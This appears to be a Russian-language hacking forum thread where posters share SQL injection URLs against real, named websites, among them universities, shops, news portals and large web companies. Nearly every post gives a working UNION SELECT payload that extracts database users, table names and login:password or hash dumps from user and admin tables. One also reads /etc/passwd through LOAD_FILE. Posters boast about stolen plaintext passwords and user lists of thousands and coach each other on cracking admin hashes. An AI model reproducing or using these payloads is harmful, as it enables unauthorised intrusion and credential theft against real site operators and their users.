http://www.cs.duke.edu/nano/faculty_details.php?facid=-16+union+select+1,2,3,4,5,convert(table_name+using +latin1),7,8,9,10,11,12,13,14,15,16+from+INFORMATI ON_SCHEMA.TABLES+limit+33,1
=\ опять еду

_http://www.eng.wayne.edu/news.php?id=-99+union+select+1,id,3,4,5,6,7,8,9,0,1,2,3+from+us ers/*
а вот с названием отстальных колонок проблемывот еще одну нашел accessid

http://www.kelektro.ru/katalog.phtml?N_KATALOG_TEXT=-1+union+select+1,user(),3,4,5,6,7,8/*

http://www.mikroakustika.ru/cnt1.php?l1=-1+union+select+1,user(),3,4,5,6/*

http://www.reusablebags.com/news.php?id=-14%20UNION%20SELECT%200,1,2,3,4,5,6,7,8/*

http://www.eventor.ru/news.php?id=-4999999994%20union%20select%201,2,3,4,5,6,7,8/*

http://www.spex.de/web/news.php?id=-2395%20UNION%20SELECT%200,1,2,3,4,5,user,password, 8,9,10,11,12,13,14,15,16%20from%20mysql.user/*

http://www.abajour.ru/news.php?id=-18%20UNION%20SELECT%200,id,concat(login,char(58),p ass),3,4%20from%20users/*

))

http://www.5557.ru/price_all.php?el=-1+union+select+1,user(),3,4,5/*

http://www.ural-market.com/auto_desc.php?Type=1&CodeTech=-1+union+select+user(),2,3,database(),5,6,7,8,9,10, 11,12/*

http://www.mcmtravel.ru/excursions/mntur.php?type=-1+union+select+1,user(),3,4,5,6,7,8,9,10/*

_http://www.entrepreneurship.appstate.edu/news.php?id=-99+union+select+1,user(),3,database(),5,6/*
ничего не смог вывести

_http://www.entrepreneurship.appstate.edu/news.php?id=-99+union+select+1,user(),3,database(),5,6/*
ничего не смог вывеститаблицы некоторые нашел но ничего интересного в них нету:(

http://www.mediacomp.ru/?action=sub_kat&top_kat=-3+union+select+1,2,3/*

http://allo-mebel.ru/shop/?dir=59'

http://boardsearch.ru/index.php?sect_id=1&rubric_id=34'

<title>Поиск <h1>Warning!</h1>
<p>Class mysql: Method SelectRow: can not complete request (SELECT * FROM rubrics WHERE rubric_id = 34\' LIMIT 1): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1</p>
/ </title>

http://allo-mebel.ru/shop/?dir=33-1
http://allo-mebel.ru/shop/?dir=32
иньекции нету.

А вот эта понравилась...
http://boardsearch.ru/index.php?sect_id=1&rubric_id=-1+UNION+SELECT+3,2,1/*
http://boardsearch.ru/index.php?sect_id=1&rubric_id=-1+UNION+SELECT+null,999999999999,AES_DECRYPT(AES_E NCRYPT(USER(),0x71),0x71)/*

хек-хек
http://boardsearch.ru/index.php?sect_id=1&rubric_id=-1+UNION+SELECT+null,999999999999,concat(user_id,ch ar(58),email,char(58),password,char(58),name,char( 58),phone)+from+users/*

И на старуху бывает проруха.

http://www.thegoldindex.com/?page=directory&item=30'

Вот на мой взгляд скули тут нету но сломать надо.
Кто расковыряет постипм сюда, но скули там нету имхо.

http://www.sobolmarket.ru/index.php?page=-1+union+select+user()/*

http://www.stmaster.ru/price.php?razd=-1+union+select+1,user()/*

http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13, 14,15/*

http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13, 14,15/*

http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,id,4,concat(name,char(58),login ,char(58),password,char(58)),6,7,8,9,10,11,12,13,1 4,15%20from%20users/*
))

http://research.udmercy.edu/ids/technoclass.php?id=-6+union+select+1,2,table_name,4,5,6+from+INFORMATI ON_SCHEMA.TABLES
там есть таблица user, но из неё не извлекается. Второй подобный сайт уже вижу =(

__http://www.shopcom.ru/shop.php?param=comment&a=1&id_shop=-1+union+select+1,2,3,name,mail,password,7,8,9,10,1 1+from+shop/*

там есть таблица user, но из неё не извлекается. Второй подобный сайт уже вижу =(

таблица есть, но она просто пустаю...возможно есть какая то другая...у меня такое было...user пустая, зато siteuser с пользователями.

2Spyder
SELECT count(*) from users

http://gamemag.ru/?act=showart&id=-947+union+select+1,concat(login,0x3a,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user s/*

http://www.rba.ru/news/vid_news.php?id=-323+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+ from+mysql.user/*

http://www.trubka.net/showsoft.php?id=-1112+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

http://nextaz.com/showsoft.php?id=-5062+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

http://www.neftegaz.ru/kadr/viewvac.php?id=-21497+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19+from+users/*

http://www.mnl.ru/viewvac.php?id_vakansiya=-27770+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35/*

http://www.joblive.ru/viewvac.php?id=-51229203+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41/*

http://www.elit-dom.com/podrobnee.php?id=-103+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.iriscom.ru/index.php?page_id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.sdbireras.ru/product_detail.php?id=30&tip=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.use r/*

http://www.cz-usa.com/product_detail.php?id=-28+union+select+1,2,3,4,5,6/*

http://www.internaltool.com/products/product_detail.php?series=-81+union+select+1,2/*

http://www.infoelekt.com/public/product_detail.php?id=-1262+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36/*

http://sportsoptics.pl/product_detail.php?group=scopes&id=-473+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38/*

2 злюка
таблица не пустая. Когда пробуешь извлечь что либо оттуда появляется ошибка. Если бы она была пустая, то просто ничего не выводилось бы =)
http://research.udmercy.edu/ids/technoclass.php?id=-6+union+select+1,2,column_name,4,5,6+from+INFORMAT ION_SCHEMA.COLUMNS+where+table_name='user'
2 [ cash ]
не вкурил немного =) появляется ошибкаю или может я что то не так делаю?

1) смотрим таблицы
http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,table_name,3,4,5,6+from+INF ORMATION_SCHEMA.TABLES/*
2)Смотрим кол-во в нужных таблицах.
http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+enrol l_accounts/*
http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+accou nts/*
http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+user/*
3)Выводим данные.
http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,concat(username,char(58),pa ssword),3,4,5,6+from+accounts/*

что тебя заинтересует я не знаю дальшейших методов взлома много дальше разбирайся сам.

in sql i trust )))

Дык я это знаю, не совсем уж ламер =) Просто count(*) from users выводит ошибку, а должна выводится по идее пустая страница
http://cat.xula.edu/courses/index.php?mode=view&id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5

http://law.richmond.edu/essaycontests/view.php?record=-12+union+select+1,2,version(),4,5,6,7,8,9,10,11,12
=\

__http://baby.com.ua/hit/school/obj_view_otziv.php3?p=view&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21/*

надо внести свой вклад :)
http://www.a1tv.ru/AOpenBands.php?Band=-1+union+select+1,2,version(),4,user()/*

надо внести свой вклад :)
http://www.a1tv.ru/AOpenBands.php?Band=-1+union+select+1,2,version(),4,user()/*
байан нитрокс :p

байан нитрокс :p

"за что ни возьмешься"... я ее сам нашел, честно :)
ладно, будем копать дальше.. странно, я сёарчем не нашел этот урл(
sorry 4 offtop =\

__http://obec.org.ru/author.php?sort=CommentsThread&sort_type=ASC&pos=0&Id=-1+union+select+1,user(),3,4,5,6,7,8/*

http://www.solyaris.ru/rinok_hi-fi/statyi_testi_obzory/?part=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15+from+INFORMATION_SCHEMA.COLUMNS--
к сожалению я ниче вытянуть не смог((
зы Кто сможет напишите в личку
юзай limit,char и будет тебе счастье ;)

http://www.aiap.it/news.php?ID=-843%20union%20select%201,2,3,4,5,6,7,8/*

http://www.opel.com.cy/news.php?id=1000000000006%20UNION%20SELECT%200,1,2 ,3,4,5,6,7%20from%20users/*

http://www.pzps.pl/news.php?id=290000000000009%20UNION%20SELECT%200,1 ,2,3,4,table_name,6,7,8%20from%20INFORMATION_SCHEM A.TABLES/*

http://www.phpdoc.org/news.php?id=-51%20UNION%20SELECT%200,id,concat(name,char(58),em ail,char(58),password),3,4%20from%20users/*

И вот этот сайт меня зарадовал:
http://www.troagri.com.cn/news.php?id=-8%20UNION%20SELECT%200,1,2,concat(username,char(58 ),email,char(58),password),4,5,6,7,8%20from%20user/*

2 _Pantera_
не правда. иногда используя INFORMATION_SCHEMA выводится только одна таблица и тогда надо использовать LIMIT
Но здесь почему то не работает
http://www.solyaris.ru/rinok_hi-fi/statyi_testi_obzory/?part=1+union+select+1,2,3,table_name,5,6,7,8,9,10 ,11,12,13,14,15+from+INFORMATION_SCHEMA.TABLES+lim it+1,1/*

2 _Pantera_
не правда. иногда используя INFORMATION_SCHEMA выводится только одна таблица и тогда надо использовать LIMIT
Но здесь почему то не работает

http://www.solyaris.ru/rinok_hi-fi/statyi_testi_obzory/?part=1+union+select+1,2,3,table_name,5,6,7,8,9,10 ,11,12,13,14,15+from+INFORMATION_SCHEMA.TABLES+lim it+1,666/*

и там по страничкам полистаешь, ог? ;)

http://www.podmoskowie.ru/index.php?c_id=3&o_id=9999+union+select+1,2,3,4,5,6,7,8,9,10,versio n(),12,13,14,15,16,17,18,19,20/*
http://www.podmoskowie.ru/index.php?c_id=3&o_id=9999+union+select+1,2,3,4,5,6,7,8,9,10,concat (login,0x3a,pwd),12,13,14,15,16,17,18,19,20+from+l nkxchange_admins/*

http://fsrio.nal.usda.gov/news_article.php?article_id=-10+union+select+1,2,3,4,5,6,7,8,9,10
=)

http://www.travellatvia.lv/8/90/0/ru/?main=5&reg=1'

через раз отвечало мне internal error, так что не доделал:
__http://www.frogview.com/show.php?file=-981+union+select+convert(table_name+using+latin1), 2,3,4+from+INFORMATION_SCHEMA.TABLES/*


чего-то колонки в Customers не вытянул
__http://www.tvtix.com/show.php?eventID=-47+union+select+111,2,3,4,5,6,7,8,9,10,1111,2,3,4, 5,6,7,8,9,10,11111,2,3,4,5,6,7,8,9,10,table_name,2 ,3,4,5,6+from+INFORMATION_SCHEMA.TABLES+limit+3,1/*
__http://www.tvtix.com/show.php?eventID=-47+union+select+111,2,3,4,5,6,7,8,9,10,1111,2,3,4, 5,6,7,8,9,10,11111,2,3,4,5,6,7,8,9,10,table_name,2 ,3,4,5,6+FROM+INFORMATION_SCHEMA.TABLES+limit+16,1/*

http://timesreporter.com/index.php?ID=-9+union+select+1,version(),3,4,5,6,7,8,9/*&r=2
=\

Моя первая скуль...
http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-9%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23/*&mode=chrono&order=0

P.S. Если кто-нибудь доведет её до ума, я буду благодарен...

http://www.italyhotel.ru/index.php?d=stadt&id=-29+union+select+1,2,3,4,5,6,7,8,9,password,11,user +from+mysql.user/*

http://www.multidmedia.com/news/news.php?id=-62+union+select+1,2,VERSION(),4,5/*

http://www.trud.ru/issue/news.php?id=-2215+union+select+1,2,5,4,5,6,7/*

http://www.almaz-antey.ru/news.php?id=-115+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+u sers/*

http://www.whenhamstersattack.com/news.php?id=-4+union+select+1,2,3,4,5,6,7/*

http://www.mostrud.ru/news.php?id=-48+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.us er/*

http://www.footballfoundation.com/news.php?id=-581+union+select+1,2,3,4,5,6,7+from+mysql.user/*

http://www.gamersinfo.net/content/news.php?id=-168+union+select+1,2,3,4,5,6,7,8,9+from+user/*

http://fishres.ru/news/news.php?id=-4471+union+select+1,2,3,4,5,6,7,8,9/*

http://www.greenshift.com/news.php?id=-134+union+select+1,password,3,4,5,6,7,8,9,10,11,12 +from+mysql.user/*

http://www.akdgs.ru/news.php?id=-49+union+select+1,2,3,4,5,6/*

http://www.marchespublics.net/actualite/news.php?id=-635+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18/*

http://www.filmdeculte.com/news/news.php?id=-3094+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.tabdc.org/news.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5/*

http://www.abajour.ru/news.php?id=-19+union+select+1,2,3,4,5/*

http://www.liverpoolfc.ru/news.php?id=-859+union+select+1,2,3,4,5,6+from+users/*

http://www.swisshotel.ru/index.php?d=stadt&id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12+fr om+mysql.user/*

Into Outfile можно применить!

__http://www.glimm-med.de/clinics.php?id=-1+union+select+1,id,3,4,login,password,7,8,9,10+fr om+users/*

__http://www.medsys.ru/index.phtml?mm=quest&sm=faq&ctype=15&cdir=-1+union+select+1,2,3,4,5/*

__http://www.androlog.ru/?module=publications&id=-1+union+select+1,user(),3,4,5/*

http://www.swisshotel.ru/index.php?d=stadt&id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12+fr om+mysql.user/*
Юзай concat(user,char(58),password)
или вместо char(58) ставь 0x3a. Это всего навсего ":" , но так удобнее:)

http://www.tectonic.co.za/view.php?id=-1+union+select+concat(username,0x3a,password),2+fr om+users/*
в title


http://www.mp3search.by/artist.php?id=-1+union+select+1,concat(login,0x3a,password)+from+ admin/*

байан делетед

первая скула , подбор столбцов не получился ,если кто сможет что нить сделать ,пишите ,90% что стоит префикс у бд.
http://www.green-pik.ru/user_profile.php?id=-7838%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

__http://www.tvmed.ru/?module=custompage&id=-1+union+select+1,2,user(),4,5,database(),7,8,9,10/*

__http://www.smdoctors.ru/razdel.php?R=-1+union+select+1,user(),3,4,5,6,7,8,9/*

__http://www.lakident.ru/index.php?id=-1+union+select+1,database(),user(),4/*

http://www.php.com/include/events/eventdetail.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35/*
=)

Моя первая:
http://www.rakurs.rovno.ua/info.php?id=-2879%20union%20select%201,2,3,4,5,6,7,8,9,s.*%20fr om%20subscribers%20s%20limit%201,1/*
http://www.rakurs.rovno.ua/info.php?id=-2879%20union%20select%201,2,3,s.*,11%20from%20cust omer%20s%20limit%204,1/*

Здесь вытянул таблицу с мейлами, тех кто подписался на рассылку:

__http://www.do-posle.ru/new_diz/show.php?id=-1+union+select+1,id,3,4,mail,6,7+from+mail/*

Здесь ничего особенного:

__http://www.psychiatry.ru/library/lib/article.php4?booknumber=6&article_id=-1+union+select+1,2,3,4,5,6/*

http://www.ifbikes.com/news.php?id=-76+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.russianrugby.ru/news.php?Id=-697+union+select+1,2,3,4,5,6/*

http://www.healthsentinel.com/news.php?event=news_print_list_item&id=-1732+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.reusablebags.com/news.php?id=-17+union+select+1,VERSION(),3,4,5,6,7,8,9/*

http://www.sakhalin.environment.ru/news.php?id=-37+union+select+1,2,3,4,5/*

http://www.ihrc.org.uk/show.php?id=-1740+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.foxreality.com/show.php?id=-4373+union+select+1,table_name,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33+from+INFORMATION_SCHEMA.TABLES/*

http://www.rusbiotech.ru/novice/show.php?id=-1832+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/*

http://www.radioguerrilla.ro/show.php?id=-21+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11/*

http://www.shanson.info/mp3/view_cat2.php?id=-6+union+select+1,2,concat(user(),char(58),database (),char(58),version())/*
с таблицами беда.

__http://www.atletika.ru/otdel.php?otdel=-1+union+select+1,concat(name,char(58),pass),3,4,5, 6,7,8,9,10,11,12,13+from+user/*

__http://www.nmsmoscow.ru/index.php?r=3&s=-1+union+select+1,2,user(),4/*

__http://www.a2dent.ru/index.php?page=-1+union+select+1,user(),database(),4,5,6,7,8,9,10/*

http://www.overclockers.com.au/news.php?id=553211%20union%20select%201,2,3,4,5,6, 7/*

http://2005.donauinselfest.at/News.php?ID=-3%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9/*

http://www.nintendo-gamers.net/news.php?id=-2%20UNION%20SELECT%200,1,id,concat(name,char(58),e mail,char(58),icq_number,char(58),password),4,5,6, 7,8,9,10,11,12,13,14,15,16%20from%20ibf_members%20 limit%201,2/*
http://www.nintendo-gamers.net/news.php?id=-2%20UNION%20SELECT%200,1,user_id,concat(username,c har(58),user_email,char(58),user_icq,char(58),user _password),4,5,6,7,8,9,10,11,12,13,14,15,16%20from %20phpbb_users%20limit%201,2/*
___

http://gonafish.com/index.php?id=-6+union+select+1,2,3,4,5,6
http://www.lostvids.com/category.php?id=-5+union+select+1,version(),3,4,5
http://www.worthplaying.com/article.php?sid=-8+union+select+1,2,3,4,concat(convert(email+using+ latin1),char(58),convert(pass+using+latin1)),6,7,8 +from+users+limit+2,1/*
http://director-online.com/buildArticle.php?id=-8+union+select+1,2,3,4,5,convert(version()+using+l atin1),7,8+from+user
http://www.istmomusic.com/php/artists.php?id=-9+union+select+1,2,3,4,5,6,7,8,9
мой небольшой улов =)

http://director-online.com/buildArticle.php?id=-8+union+select+1,2,3,4,5,convert(version()+using+l atin1),7,8+from+user
Ты уже четвертый, кто выкладывает этот сайт... :)

=) ну так я же не проверяю все 68 страниц

http://www.overclockers.com.au/news.php?id=553211%20union%20select%201,2,3,4,5,6, 7/*
ты тоже не первый =)

http://www.cmsobzor.ru/fa.php?aid=-99+union+select+user(),2,3,4,5,6,7,8,9,10,11/*

А вот сюда без прокси не лезть!:

__http://www.rjo.ru/news/index.php?rash=detail&idnews=-99+union+select+1,concat(id,char(58),login,char(58 ),name,char(58),email,char(58),phone,char(58),pass word),3,4,5,6,7+from+logins/*

спасибо kamaz'у за помощь!

http://www.phpbuddy.com/article.php?id=-6+union+select+1,2,version(),4,5,6
улыбнуло =)

http://www.farma-96.ru/index.php?main=catalogue&object=round&round_ID=-1+union+select+1,2,3,4,concat(name,0x3a,pass),6,7, 8,9,10+from+users/*
правда ничего не дало, но скуля)

http://www.farma-96.ru/index.php?main=catalogue&object=round&round_ID=-1+union+select+1,2,3,4,concat(name,0x3a,pass),6,7, 8,9,10+from+users+limit+1,1/*
пасс в чистом виде
пасиб за поправку :)
хз, я просто копаться дальше не стал))

http://www.it-news.cc/index.php?type=article&ID=-1+union+select+user()/*

http://www.toxic.com.ua/news_view.php?i=-1+union+select+1,2,3,4

http://tony.proskaters.kiev.ua/index.php?details=-1+union+select+1,2,3,4,5,6/*

не смог подобрать названия таблиц

http://www.rshu.edu.ua/?p=10&sid='

http://www.widgetmonkey.com/detail.php?id=-5+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5
папок на запись не нашёл

__http://www.ergo-line.ru/operative/sng/?saleID=-1+union+select+1,2,concat(user(),char(58),database (),char(58),version()),4,5,6,7,8,9,10,11,12/*

__http://www.vechnayamolodost.ru/index2.php?idtopmenu=2&idsubmenu=-133+union+select+1,2,3,concat(user,char(58),passwo rd),5,6,7,8,9,0,11,12,13,14+from+mysql.user/*

ошибка в mssql, стоит на винде
http://publicsafetyinfo.wvu.edu/Transcript/?id=1+or+1=(select+TOP+1+table_name+from+INFORMATI ON_SCHEMA.TABLES)--

http://www.area3d.ch/downloads.php?cat=-99'+union+select+1,2,3/*
опять нифига не подобрал)) выведите юзеров булки лучше

2 _Pantera_
у меня этих скулей в эду доменах...
эта уже пару месяцев лежит, вот
http://moritzlaw.osu.edu/faculty/bios.php?ID=-99+union+select+1,2,3,password,username,6,7,8,9,10 ,11,12,13,14,15,16,17+from+access

http://www.piratesinfo.com/biography/biography.php?article_id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23+from+INFORMATION _SCHEMA.TABLES/*
можете покопаться :D там много таблиц)

http://www.piratesinfo.com/biography/biography.php?article_id=-1+union+select+1,2,concat(username,0x3a,password,0 x3a,email,0x3a,0x3a),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23+from+phorum_users/*
база 2к юзеров login:md5hash:email:: с форума

можете покопаться) хэш там расшифровать админский или другие таблицы глянуть..) я заколебался)

http://chaoscity.chaosroad.com/kernel/class/class.mysql.php

Вообще реально,что нибудь дальше?...подскажите нубу =)

нет

__http://www.center-torg.ru/?pageId=2&catId=-1+union+select+1,table_name,3,4,5,6,7+from+INFORMA TION_SCHEMA.TABLES/*

__http://www.master-office.ru/index.php?l=2&pid=-1+union+select+1,2,user(),4,5,6,7/*

__http://www.kroki.ru/view_catalog.php?mtypeid=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4,5/*

http://www.ttg-java.ru/photo/gallery.php?_id=-1+union+select+1,version(),3,4/*
http://www.mobitronic.ru/index.php?part_id=-1+union+select+1,user()/*
http://www.gday.ru/print.php?cat=99999+union+select+1,2,3,4,5,6,7,8,9 ,10,version(),12,13,14,15/*
http://www.marinastilist.ru/foto.php?cat=-1+union+select+1,2,3,user(),5/*

http://www.wingspan.org/content/evt_details.php?event_id=-33+union+select+1,convert(version()+using+latin1), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33][еК

__http://www.jorin.ru/content.php?id=-1+union+select+concat(database(),char(58),user(),c har(58),version())/*

__http://www.westauto.ru/news.php?news=yes&newsid=-1+union+select+concat(database(),char(58),user(),c har(58),version()),2,3,4/*

Смотрим имена таблиц:

__http://www.sportobzor.ru/index.php?id=55&page=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*

Пароль и логин админа:

__http://www.sportobzor.ru/index.php?id=55&page=-1+union+select+1,2,3,4,concat(username,char(58),pa ssword),6,7,8,9,10,11,12,13+from+admin/*

Моя первая :)

http://www.basketball.ru/netcat/modules/user/profile.php?userid=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7/*

mail.ru
http://corp.mail.ru/press.html?mode=-1+union+select+1,2,3,4,user()/*

http://www.flugzeugbilder.de/show.php?id=-588342+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20+from+mysql.user/*

http://www.cybwarrior.com/download/show.php?id=-47+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+fo rum/*

http://www.xtremepsp.com/downloads.php?cat=-2+union+select+1,2,3,4,Password,6,7,8+from+admin/*

http://www.a1k.it/downloads.php?cat=-9+union+select+1,concat(username,char(58),user_icq ,char(58),user_password),3,4,5,6,7,8,9+from+phpbb_ users+limit+1,1/*

http://www.davidyassky.com/issues.php?id=-24+union+select+1,2,3,4,5,6,7,8,9/*

http://www.cut-up.com/news/issues.php?issue=-13+union+select+1,2,3,4,VERSION()/*

http://cidoc.ics.forth.gr/issues.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.davealbo.com/issues.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.lccp.org/issues.php?ID=-6+union+select+1,2,3,4,password,6,7,8+from+users/*

http://tell-me-more.org/issues.php?ID=-21+union+select+1,2,3,4,5,6,7,8/*

http://www.ekipirovka.ru/issues.php?id=-47+union+select+1,2,3/*

http://www.cmslaw.com/current-issues.php?id=-3+union+select+1,2,3,4,5,6,7/*

__http://www.runiga.com/ruso/home.php?pageid=190&id=-1+union+select+1,2,3,concat(login,char(58),email), 5,6,7,8,9+from+users/*

http://www.pdma.org/news.php?ID=-189%20union%20select%201,2,3,4,5,6,7,8,9,0%20from% 20user/*

http://www.calmapro.com/popeye/news.php?id=38%20UNION%20SELECT%200,1,id,concat(us ername,char(58),password),4,5,6,7%20from%20users/*

http://www.cinecon.com/news.php?sid=-391%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,1 2,13,14/*

http://news.qs.kiev.ua/lenta/news.php?id=3890909397%20UNION%20SELECT%200,1,2,3, 4,5,6,7,8%20from%20mysql.user/*

http://tombraider.ugo.com/games/news.php?id=176%20union%20select%201,2,3,4,5,6,7,8/*

http://www.spoonohost.com/about/news.php?id=1%20union%20select%201,2,3,4,5/*

:)

http://www.mtas.ru/second.php?ID=15%20UNION%20SELECT%20null/*

http://www.flirtanica.ru/articles1.php?id=-1%20UNION%20SELECT%201,version(),3,4,user()/*

http://www.fullboost.com.au/news.php?newsId=-179%20union%20select%201,2,3,concat(database(),cha r(58),user(),char(58),version()),5,6,7,version(),9 ,10,11/*

http://www.pitermag.ru/labels.php?do=ViewBrand&id=-1+union+select+1,database(),3,4,5,6,7/*
если было, сорри :)
http://rpg.gameforums.ru/sections.php?op=viewarticle&artid=-1+union+select+1,2,3,4,5,6,concat(uname,0x3a,pass, 0x3a,email,0x3a,0x3a),8,9,10,11,12,13+from+users+l imit+1,1/*
там 50к юзеров вроде как, дерзайте ;)




upd:
http://www.bonsk.ru/seminars.php?id=-1+union+select+1,2,3,4,database(),6,7,8,9,10,11,12 ,13,14,15,16,17/*
http://sibdeti.ru/adresa.php?tip=-1+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13, 14,15/*
сайты взаимосвязаны.. копаться не стал, т.к. ничего явного не нашел, а пинг до сайтов большой =\

15.22pm upd2:
http://www.daoiststudies.org/scholars.php?cmd=list&userid=-1+union+select+1,2,3,4,database(),6,7,8,9,10,11,12 ,13,14,15,16,17,18/*
копаться также не стал, убегаю :p

2n1†R0x
http://sibdeti.ru/adresa.php?tip=-1+union+select+1,2,concat(username,char(58),user_p assword,char(58),user_email,char(58),user_icq),4,5 ,6,7,8,9,10,11,12,13,14,15+from+phpbb_users/* ну вот например таблица юзеров, можно админский хеш попробовать раcшивровать. ;)

http://www.daoiststudies.org/scholars.php?cmd=list&userid=-1+union+select+1,2,concat(email,char(58),password) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+membe rs+limit+0,1/* и перебираем,пасс в чистом виде;)

http://www.ebrain.org.zm/content.php?id=-9%20union%20select%201,id,concat(username,char(58) ,password),4%20from%20users/*

http://www.azs.agh.edu.pl/news.php?id=-225%20UNION%20SELECT%200,1,2,3,4,5,6,7,concat(name ,char(58),password),9,10,11,12%20from%20users/*

http://80.241.173.147/icimus/news.php?id=15%20union%20select%201,2,3,4/*

http://centerstageproject.com/news.php?id=129%20UNION%20SELECT%200,1,2,3,4,5,6%2 0from%20information_schema.tables/*
)))

__http://www.herb4all.ru/index.php?group=1000+union+select+1,version(),3/*

__http://www.mp2.ru/?p_id=-1+union+select+1,version(),concat(database(),char( 58),user())/*

__http://www.japanfish.ru/index.php?razdel=-1+union+select+1,2,3/*

http://www.superherohype.com/news/topnews.php?id=-1+union+select+1
Yahoo.Com
http://widgets.yahoo.com/gallery/view.php?widget=41405'
http://widgets.yahoo.com/gallery/view.php?widget=41405+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15/*

_http://www.clan-peppers.ru/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

Надеюсь у кого нибудь получиться доломать до пасса админа =)

http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5 ,6,7,8+from+mysql.user+limit+45/*

user:root а дальше пасса чето не могу найти)))

http://www.corp-gov.ru/bd/index.php3?base_id=-1+union+select+1,version(),3,4,5/*

http://www.clan-peppers.ru/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

Надеюсь у кого нибудь получиться доломать до пасса админа =)
Я не знаю, как можно достучаться до пасса админа, не имея скуля. Сайт выдает ошибку при любом значении id..

http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5 ,6,7,8+from+mysql.user+limit+45/*


Мдя, ничего не понимаю. При запросе http://www.keckobservatory.org/article.php?id=-99+union+select+111,2,3,4,5,6,7,8+from+mysql.user
Сайт выдает принтабельной колонку 1. (html код =>
printer_friendly_without.php?id=111)

При запросе http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5 ,6,7,8+from+mysql.user
Проявляется printer_friendly_without.php?id=root

Но при запросах http://www.keckobservatory.org/article.php?id=-99+union+select+user,2,3,4,5,6,7,8+from+mysql.user
и
http://www.keckobservatory.org/article.php?id=-99+union+select+password,2,3,4,5,6,7,8+from+mysql. user
